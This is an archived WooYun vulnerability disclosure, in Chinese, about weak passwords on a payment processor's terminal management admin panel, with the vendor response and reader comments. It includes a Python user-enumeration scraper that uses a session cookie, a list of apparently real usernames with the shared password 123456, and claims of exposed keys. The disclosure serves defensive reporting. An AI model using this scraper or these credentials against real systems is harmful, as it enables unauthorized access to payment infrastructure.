某大型第三方支付机构商务终端TPM系统用户体制不严涉及大量敏感信息

2017年4月20日04:28:36评论234 views字数 256阅读0分51秒阅读模式

摘要

2016-04-19：细节已通知厂商并且等待厂商处理中
2016-04-22：厂商已经确认，细节仅向厂商公开
2016-05-02：细节向核心白帽子及相关领域专家公开
2016-05-12：细节向普通白帽子公开
2016-05-22：细节向实习白帽子公开
2016-06-06：细节向公众公开

漏洞概要关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-198017

漏洞标题：某大型第三方支付机构商务终端TPM系统用户体制不严涉及大量敏感信息

漏洞作者： jianFen

提交时间： 2016-04-19 11:40

公开时间： 2016-06-06 16:50

漏洞类型：后台弱口令

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：弱口令后台管理地址对外

0人收藏

漏洞详情

披露状态：

简要描述：

1 .通过手动远程下载来实现POS程序升级和通过自动远程下载来实现POS程序升级，以及新装机业务的程序、参数下载

2 .POS机由分公司灌装主密钥后分发到各地市，若有新装机，则由地市维护人员远程下装应用程序和参数来实现快速装机

详细说明：

中国银联终端远程维护管理系统(TMS)

http://

mask 区域

1.://**.**.**/tpm/ms/login.do

人名字典爆破

lijing/123456 权限不高但是也有不少数据通过在线用户获取用户名

手爬太枯燥了

我这里直接代码上的是之后发送邮件处能查找的所以用户的列表和"在线用户方法一样"

code 区域

#coding=utf-8
 import requests
 import re
 from lxml import etree
 import time
 import sys
 
 sys.getdefaultencoding()
 reload(sys)
 sys.setdefaultencoding('UTF-8')
 sys.getdefaultencoding()
 
 
 def postcode(pageId):
  url = "http://***********/tpm/ms/user/userListLookupMul.do"
  
  head = {
  'Host': '***********',
  'Proxy-Connection': 'keep-alive',
  'Content-Length': '45',
  'Accept': '*/*',
  'Origin': 'http://***********',
  'X-Requested-With': 'XMLHttpRequest',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0',
  'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
  'Referer': 'http://***********/tpm/ms/index.do',
  'Accept-Encoding': 'gzip,deflate',
  'Accept-Language': 'zh-CN,zh;q=0.8',
  'Cookie': 'JSESSIONID=************************'
  }
 
 
  data= "pageNum="+pageId+"&loginName=&name=&**.**.**.**rg=&hisIusr=&numPerPage=20"
 
  proxy={'http':'**.**.**.**:8080'}
 
  key = requests.post(url,headers=head,data=data,proxies=proxy)
  #print key.headers
  calc = key.text
  #print calc
  
  selector = etree.HTML(calc)
 
  content = selector.xpath('//tr/td[@onclick="chooseTd(this)"][position()=1]/text()')
 
 
 
  fp1 = open("C:/Users/Administrator/Desktop//loginname1.txt",'a')
  for i in content:
   fp1.write(''.join(i.split())+'/n')
 
  
 
 
 
 #获取验证码
 
 fp = open("C:/Users/Administrator/Desktop//id.txt")
 
 
 #postcode('1')
 print u'处理开始'
 for i in fp:
  postcode(i[:-1])
  print 'page spider full%s'%i

code 区域

tghe
 ynli
 ypwu
 xzhguo
 zhongduan2
 ybjiang
 tghe
 ypwu
 xjzhu
 rbhong
 ynli
 yhzhang
 hlliu3
 taoluo
 xiaxiao
 lijing
 geyong
 xucao1
 zztang
 dlyang
 caixq
 kyyang
 jingwang2
 mjjiang
 jilin1
 yqjiang
 VFI-QiuGX
 jlchen2
 ywang1
 wangdw
 hzdeng
 jmguo

密码均为123456

jmguo/123456

登录几个高权限

TMS系统

开发项目信息

秘钥

漏洞证明：

20万+ 秘钥查看元素即可

修复方案：

1.验证码验证一次

2.用户体制不严

3.系统对外

版权声明：转载请注明来源 jianFen@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-04-22 16:40

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国银联,由其后续协调网站管理部门处置.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-19 11:41 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习，多挖洞！)

0

前排坐等公开

1# 回复此人
2016-06-08 23:53 | 指尖上的故事 ( 普通白帽子 | Rank:794 漏洞数:175 | 放手不是我们不合适 | 而是成就你们更适合)

0

LZ星号密码查看是什么工具可以分享吗

2# 回复此人

漏洞概要 关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-198017

漏洞标题： 某大型第三方支付机构商务终端TPM系统用户体制不严涉及大量敏感信息

相关厂商： 某大型第三方支付机构